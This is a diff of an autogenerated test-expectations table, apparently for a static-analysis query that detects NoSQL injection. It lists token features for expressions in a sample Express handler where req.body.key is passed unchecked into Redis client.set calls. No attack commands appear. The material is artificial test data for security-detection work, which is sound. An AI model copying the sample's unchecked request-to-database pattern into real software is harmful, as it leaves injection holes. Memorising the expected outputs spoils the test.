autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:23 | req.body | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:23 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:23 | req.body | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:27 | req.body.key | CalleeFlexibleAccessPath | client.set | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:27 | req.body.key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:27 | req.body.key | calleeImports | redis | @@ -3967,6 +19315,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:27 | req.body.key | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:27 | req.body.key | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:16:10:27 | req.body.key | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:20:10:23 | body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:20:10:23 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:20:10:23 | body | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:20:10:23 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:20:10:23 | body | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:25:10:27 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:25:10:27 | key | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:25:10:27 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:25:10:27 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:25:10:27 | key | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:30:10:36 | "value" | CalleeFlexibleAccessPath | client.set | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:30:10:36 | "value" | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:30:10:36 | "value" | calleeImports | redis | @@ -3976,6 +19334,104 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:30:10:36 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:30:10:36 | "value" | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:10:30:10:36 | "value" | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:11 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:11 | key | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:11 | key | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:11 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:11 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:11 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:11 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:11 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:26 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:26 | key | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:26 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:26 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:26 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:26 | key = req.body.key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:26 | key = req.body.key | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:26 | key = req.body.key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:26 | key = req.body.key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:9:12:26 | key = req.body.key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:17 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:17 | req | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:17 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:17 | req | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:22 | req.body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:22 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:22 | req.body | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:22 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:22 | req.body | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:26 | req.body.key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:26 | req.body.key | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:26 | req.body.key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:26 | req.body.key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:15:12:26 | req.body.key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:19:12:22 | body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:19:12:22 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:19:12:22 | body | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:19:12:22 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:19:12:22 | body | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:24:12:26 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:24:12:26 | key | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:24:12:26 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:24:12:26 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:12:24:12:26 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:18 | typeof key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:18 | typeof key | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:18 | typeof key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:18 | typeof key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:18 | typeof key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | key | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | key | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | typeof ... string" | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | typeof ... string" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | typeof ... string" | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | typeof ... string" | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:9:13:31 | typeof ... string" | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:16:13:18 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:16:13:18 | key | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:16:13:18 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:16:13:18 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:16:13:18 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:24:13:31 | "string" | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:24:13:31 | "string" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:24:13:31 | "string" | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:24:13:31 | "string" | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:13:24:13:31 | "string" | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:14 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:14 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:14 | client | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:14 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:14 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:18 | client.set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:18 | client.set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:18 | client.set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:18 | client.set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:18 | client.set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:32 | client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:32 | client. ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:32 | client. ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:32 | client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:32 | client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:32 | exceptional return of client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:32 | exceptional return of client. ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:32 | exceptional return of client. ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:32 | exceptional return of client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:9:14:32 | exceptional return of client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:16:14:18 | set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:16:14:18 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:16:14:18 | set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:16:14:18 | set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:16:14:18 | set | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:20:14:22 | key | CalleeFlexibleAccessPath | client.set | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:20:14:22 | key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:20:14:22 | key | calleeImports | redis | @@ -3994,6 +19450,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:25:14:31 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:25:14:31 | "value" | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:14:25:14:31 | "value" | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:14 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:14 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:14 | client | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:14 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:14 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:18 | client.set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:18 | client.set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:18 | client.set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:18 | client.set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:18 | client.set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:36 | client. ... alue"]) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:36 | client. ... alue"]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:36 | client. ... alue"]) | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:36 | client. ... alue"]) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:36 | client. ... alue"]) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:36 | exceptional return of client. ... alue"]) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:36 | exceptional return of client. ... alue"]) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:36 | exceptional return of client. ... alue"]) | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:36 | exceptional return of client. ... alue"]) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:9:15:36 | exceptional return of client. ... alue"]) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:16:15:18 | set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:16:15:18 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:16:15:18 | set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:16:15:18 | set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:16:15:18 | set | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:20:15:35 | ["key", "value"] | CalleeFlexibleAccessPath | client.set | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:20:15:35 | ["key", "value"] | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:20:15:35 | ["key", "value"] | calleeImports | redis | @@ -4004,15 +19485,55 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:20:15:35 | ["key", "value"] | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:20:15:35 | ["key", "value"] | receiverName | client | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:21:15:25 | "key" | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:21:15:25 | "key" | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:21:15:25 | "key" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:21:15:25 | "key" | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:21:15:25 | "key" | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:21:15:25 | "key" | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:21:15:25 | "key" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:21:15:25 | "key" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:21:15:25 | "key" | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:21:15:25 | "key" | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:28:15:34 | "value" | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:28:15:34 | "value" | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:28:15:34 | "value" | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:28:15:34 | "value" | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:28:15:34 | "value" | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:28:15:34 | "value" | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:28:15:34 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:28:15:34 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:28:15:34 | "value" | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:15:28:15:34 | "value" | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:5 | key | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:5 | key | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:5 | key | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:5 | key | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:5 | key | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:10 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:10 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:10 | client | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:10 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:10 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:14 | client.set | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:14 | client.set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:14 | client.set | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:14 | client.set | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:14 | client.set | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:28 | client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:28 | client. ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:28 | client. ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:28 | client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:28 | client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:28 | exceptional return of client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:28 | exceptional return of client. ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:28 | exceptional return of client. ... value") | enclosingFunctionBody | req res client set req body key value key req body key key string client set key value client set key value client set key value client hmset key field value key value2 client multi set constant value set key value get key exec err replies client duplicate err newClient newClient set key value client duplicate set key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:28 | exceptional return of client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:18:5:18:28 | exceptional return of client. ... value") | fileImports | body-parser express redis util | +| 